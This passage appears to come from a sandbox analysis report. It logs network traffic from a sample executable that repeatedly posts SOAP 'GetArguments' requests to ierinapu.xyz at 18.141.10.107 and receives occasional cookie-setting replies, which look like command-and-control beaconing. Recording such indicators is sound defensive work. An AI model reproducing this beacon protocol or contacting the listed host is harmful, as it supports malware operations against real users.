Oct 20, 2024 21:03:03.439096928 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49938	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:03:06.069849014 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:03:06.423458099 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49950	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:03:08.616539955 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:03:08.970402002 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Oct 20, 2024 21:03:10.161314964 CEST	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49961	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:03:11.180259943 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:03:11.532819033 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Oct 20, 2024 21:03:12.946690083 CEST	25	IN	HTTP/1.1 100 Continue
Oct 20, 2024 21:03:12.949387074 CEST	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49974	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:03:13.960597992 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:03:14.314140081 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Oct 20, 2024 21:03:15.499345064 CEST	25	IN	HTTP/1.1 100 Continue
Oct 20, 2024 21:03:15.499362946 CEST	464	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 20 Oct 2024 19:03:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=708f51a700d899340d4a665e90a7924a\|96.44.151.125\|1729450995\|1729450995\|0\|1\|0; path=/; domain=.ierinapu.xyz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Content-Encoding: gzip Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49987	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:03:16.507194042 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:03:16.860898018 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49999	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:03:19.070477009 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:03:19.423474073 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50007	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:03:21.618640900 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:03:21.970757961 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50008	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:03:24.283757925 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:03:24.642189026 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50009	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:03:26.835433960 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:03:27.189223051 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50010	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:03:29.398751020 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:03:29.751642942 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50011	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:03:31.931746006 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:03:32.282896996 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50012	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:03:34.421329975 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:03:34.767177105 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	50013	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:03:36.887742043 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:03:37.236094952 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	50014	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:03:39.305103064 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:03:39.657978058 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	50015	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:03:41.695796967 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:03:42.048417091 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	50016	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:03:44.088260889 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:03:44.439193010 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Oct 20, 2024 21:03:45.617157936 CEST	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	50017	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:03:46.413619041 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:03:46.767276049 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Oct 20, 2024 21:03:47.951793909 CEST	489	IN	HTTP/1.1 100 Continue Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 30 20 4f 63 74 20 32 30 32 34 20 31 39 3a 30 33 3a 34 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 62 74 73 74 3d 31 38 38 38 61 36 66 36 62 36 34 39 37 62 32 63 65 61 61 30 62 35 65 65 64 64 31 37 34 63 38 39 7c 39 36 2e 34 34 2e 31 35 31 2e 31 32 35 7c 31 37 32 39 34 35 31 30 32 37 7c 31 37 32 39 34 35 31 30 32 37 7c 30 7c 31 7c 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 69 65 72 69 6e 61 70 75 2e 78 79 7a 3b 20 45 78 70 69 72 65 73 3d 54 68 75 2c 20 31 35 20 41 70 72 20 32 30 32 37 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 3b 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 [TRUNCATED] Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 20 Oct 2024 19:03:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeSet-Cookie: btst=1888a6f6b6497b2ceaa0b5eedd174c89\|96.44.151.125\|1729451027\|1729451027\|0\|1\|0; path=/; domain=.ierinapu.xyz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMTContent-Encoding: gzip140

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	50018	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:03:48.726480007 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:03:49.079709053 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	50019	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:03:51.023456097 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:03:51.376565933 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	50020	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:03:53.485963106 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:03:53.845417023 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Oct 20, 2024 21:03:54.314064026 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Oct 20, 2024 21:03:55.061579943 CEST	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	50021	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:03:55.991940022 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:03:56.345400095 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	50022	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:03:58.226347923 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:03:58.579844952 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	50023	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
